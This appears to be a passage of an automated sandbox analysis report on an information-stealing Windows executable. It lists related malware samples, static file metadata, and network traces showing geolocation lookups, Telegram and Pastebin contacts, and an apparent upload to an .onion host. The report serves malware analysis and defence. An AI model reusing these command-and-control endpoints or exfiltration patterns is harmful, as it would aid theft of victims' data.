                                                                            https://mnrdtfqrcyfqiou.s3.amazonaws.com/mnrdtfqrcyfqiou.html#4HHHnO7279bGJq492fumheqtoju1686NCUIKVMPNMDQVMT689230/736882Y21#qgow23ahs76jjbq8j26ouc8n3ucpjfst25g85oeaei03mafty5n389rGet hashmaliciousHTMLPhisherBrowse
                                                                            • 167.71.30.39
                                                                            cvdLNZXNPZ.elfGet hashmaliciousMiraiBrowse
                                                                            • 165.23.95.65
                                                                            SecuriteInfo.com.Trojan.Siggen10.9096.15276.30319.exeGet hashmaliciousNjratBrowse
                                                                            • 157.245.191.173
                                                                            SecuriteInfo.com.FileRepMalware.20494.7181.exeGet hashmaliciousXmrigBrowse
                                                                            • 178.128.242.134
                                                                            f699.jsGet hashmaliciousUnknownBrowse
                                                                            • 164.90.149.198
                                                                            AhbJkpk3Z8.elfGet hashmaliciousUnknownBrowse
                                                                            • 134.209.44.115
                                                                            https://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.euGet hashmaliciousUnknownBrowse
                                                                            • 134.122.57.34
                                                                            TUT-ASUSDHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            YPT23-117419 numaral#U0131 Dekont-20240328.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            T_240369_S#U0130PAR#U0130S.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                                            • 208.95.112.1
                                                                            x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 208.95.112.1

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            7dcce5b76c8b17472d024758970a406bRFQ.docGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 3118.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 3118.docGet hashmaliciousAgentTeslaBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 67789034.docGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            RFQ No. 5490490.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            RFQ No. 5490490.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            New Order 3118.rtfGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            #1337.docGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99
                                                                            1.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            • 149.154.167.99

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            No created / dropped files found

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):5.640265630210374
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:Stealer.exe
                                                                            File size:344'064 bytes
                                                                            MD5:495f88115eabed181e30727f2d2363d3
                                                                            SHA1:59cd87a7e30926fc7c51a921b78216119f9d4f1c
                                                                            SHA256:cfef836fa4515f5371b8a30300098bdb03d4c91b123f0a35252757bc73b388f2
                                                                            SHA512:f71afad61cca5a15cb01a4aa342d92710c4d5c72c1b5d059f1bd63238d5a768e9c495fb5632ebfcae086b8e994076e26b1e557139cfd8303c26e8b2b1811a2a8
                                                                            SSDEEP:3072:hJucc5yxBhJNfx53RJTpB+d9IIYFNnFqhGCFbcnEGTUU8aJc/HUexspPyEVCYdXY:hJuE/FkiTaiDy+rztBRBwFbo5VdJ
                                                                            TLSH:2B74A72837994729E1B4273D4C37233293B523536F17730AAA4370A52951ABD9D0BAFF
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T............"...0..4...........S... ...`....@.. ....................................`................................

                                                                            File Icon

                                                                            Icon Hash:aaf3e3e3918382a0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4553de
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x81805410 [Sat Nov 6 15:43:12 2038 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x553840x57.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x612.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000x533e40x5340093c0df87a9164bbce13b1ff10a324279False0.4601192989864865data5.656298703669978IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x560000x6120x800693bc77a0c1a5ca627b1d62d880e0a91False0.34228515625data3.545184940020113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x580000xc0x20030edaabb71d7d449943a334cf07dd46dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_VERSION0x560a00x388data0.4358407079646018
                                                                            RT_MANIFEST0x564280x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 29, 2024 10:30:47.210452080 CET4916380192.168.2.22208.95.112.1
                                                                            Mar 29, 2024 10:30:47.304770947 CET8049163208.95.112.1192.168.2.22
                                                                            Mar 29, 2024 10:30:47.304857969 CET4916380192.168.2.22208.95.112.1
                                                                            Mar 29, 2024 10:30:47.307265043 CET4916380192.168.2.22208.95.112.1
                                                                            Mar 29, 2024 10:30:47.403111935 CET8049163208.95.112.1192.168.2.22
                                                                            Mar 29, 2024 10:30:47.603485107 CET4916380192.168.2.22208.95.112.1
                                                                            Mar 29, 2024 10:30:49.160450935 CET4916380192.168.2.22208.95.112.1
                                                                            Mar 29, 2024 10:30:49.254760027 CET8049163208.95.112.1192.168.2.22
                                                                            Mar 29, 2024 10:30:49.257376909 CET4916380192.168.2.22208.95.112.1
                                                                            Mar 29, 2024 10:30:49.377945900 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:49.377978086 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:49.378061056 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:49.483197927 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:49.483233929 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:49.861136913 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:49.861210108 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:49.866909027 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:49.866916895 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:49.867309093 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:49.946604967 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:49.992238045 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229649067 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229701996 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229712009 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229741096 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229762077 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229767084 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:50.229792118 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229808092 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:50.229855061 CET44349164149.154.167.99192.168.2.22
                                                                            Mar 29, 2024 10:30:50.229911089 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:50.230161905 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:50.232543945 CET49164443192.168.2.22149.154.167.99
                                                                            Mar 29, 2024 10:30:50.466140985 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:50.466178894 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:50.466248989 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:50.466836929 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:50.466850042 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:50.666232109 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:50.666316032 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:50.672126055 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:50.672136068 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:50.672432899 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:50.682517052 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:50.724236012 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:51.342000961 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:51.342128038 CET44349165172.67.34.170192.168.2.22
                                                                            Mar 29, 2024 10:30:51.342597008 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:51.343908072 CET49165443192.168.2.22172.67.34.170
                                                                            Mar 29, 2024 10:30:51.357322931 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:30:51.541559935 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:30:51.541632891 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:30:51.541835070 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:30:51.724695921 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:30:51.724992990 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:30:51.725244045 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:30:51.948698044 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:40.005934000 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:40.006102085 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:40.189251900 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:40.726600885 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:40.726865053 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:40.909914017 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:40.910185099 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.093233109 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.093571901 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.276586056 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.276614904 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.276627064 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.276861906 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.277498960 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.277509928 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.277543068 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.277566910 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.277610064 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.277642965 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.277642965 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.460103989 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460150957 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460156918 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460161924 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460166931 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460171938 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460318089 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460350037 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460479021 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.460556030 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.460623980 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.460644960 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.643723011 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.643747091 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.643774986 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.643785954 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.643806934 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.643863916 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.643863916 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.643906116 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.643953085 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:41.644222021 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.644361973 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.644480944 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.644610882 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.644669056 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.644798040 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.644809008 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.645052910 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.645064116 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.645128012 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.645190001 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.645200968 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.645235062 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.645404100 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.826833963 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.826848984 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.826859951 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.826942921 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.826953888 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.826963902 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.826996088 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827011108 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827035904 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827109098 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827157974 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827235937 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827275038 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827341080 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827356100 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827394009 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:41.827425957 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:47.469018936 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:47.469043016 CET920049166188.166.166.142192.168.2.22
                                                                            Mar 29, 2024 10:31:47.469258070 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:47.473097086 CET491669200192.168.2.22188.166.166.142
                                                                            Mar 29, 2024 10:31:47.655802965 CET920049166188.166.166.142192.168.2.22

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 29, 2024 10:30:46.629488945 CET5456253192.168.2.228.8.8.8
                                                                            Mar 29, 2024 10:30:46.744688034 CET53545628.8.8.8192.168.2.22
                                                                            Mar 29, 2024 10:30:49.168119907 CET5291753192.168.2.228.8.8.8
                                                                            Mar 29, 2024 10:30:49.270401955 CET53529178.8.8.8192.168.2.22
                                                                            Mar 29, 2024 10:30:49.273977041 CET5291753192.168.2.228.8.8.8
                                                                            Mar 29, 2024 10:30:49.376312017 CET53529178.8.8.8192.168.2.22
                                                                            Mar 29, 2024 10:30:50.245299101 CET6275153192.168.2.228.8.8.8
                                                                            Mar 29, 2024 10:30:50.355515957 CET53627518.8.8.8192.168.2.22
                                                                            Mar 29, 2024 10:30:50.355808020 CET6275153192.168.2.228.8.8.8
                                                                            Mar 29, 2024 10:30:50.461611032 CET53627518.8.8.8192.168.2.22

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Mar 29, 2024 10:30:46.629488945 CET192.168.2.228.8.8.80xd57bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:49.168119907 CET192.168.2.228.8.8.80xf242Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:49.273977041 CET192.168.2.228.8.8.80xf242Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.245299101 CET192.168.2.228.8.8.80xcd5eStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.355808020 CET192.168.2.228.8.8.80xcd5eStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Mar 29, 2024 10:30:46.744688034 CET8.8.8.8192.168.2.220xd57bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:49.270401955 CET8.8.8.8192.168.2.220xf242No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:49.376312017 CET8.8.8.8192.168.2.220xf242No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.355515957 CET8.8.8.8192.168.2.220xcd5eNo error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.355515957 CET8.8.8.8192.168.2.220xcd5eNo error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.355515957 CET8.8.8.8192.168.2.220xcd5eNo error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.461611032 CET8.8.8.8192.168.2.220xcd5eNo error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.461611032 CET8.8.8.8192.168.2.220xcd5eNo error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
                                                                            Mar 29, 2024 10:30:50.461611032 CET8.8.8.8192.168.2.220xcd5eNo error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • t.me
                                                                            • pastebin.com
                                                                            • ip-api.com
                                                                            • izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onioncontent-length: 110240expect: 100-continueconnection: keep-alive

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249163208.95.112.1802308C:\Users\user\Desktop\Stealer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 29, 2024 10:30:47.307265043 CET64OUTGET /json HTTP/1.1
                                                                            Host: ip-api.com
                                                                            Connection: Keep-Alive
                                                                            Mar 29, 2024 10:30:47.403111935 CET486INHTTP/1.1 200 OK
                                                                            Date: Fri, 29 Mar 2024 09:30:47 GMT
                                                                            Content-Type: application/json; charset=utf-8
                                                                            Content-Length: 309
                                                                            Access-Control-Allow-Origin: *
                                                                            X-Ttl: 60
                                                                            X-Rl: 44
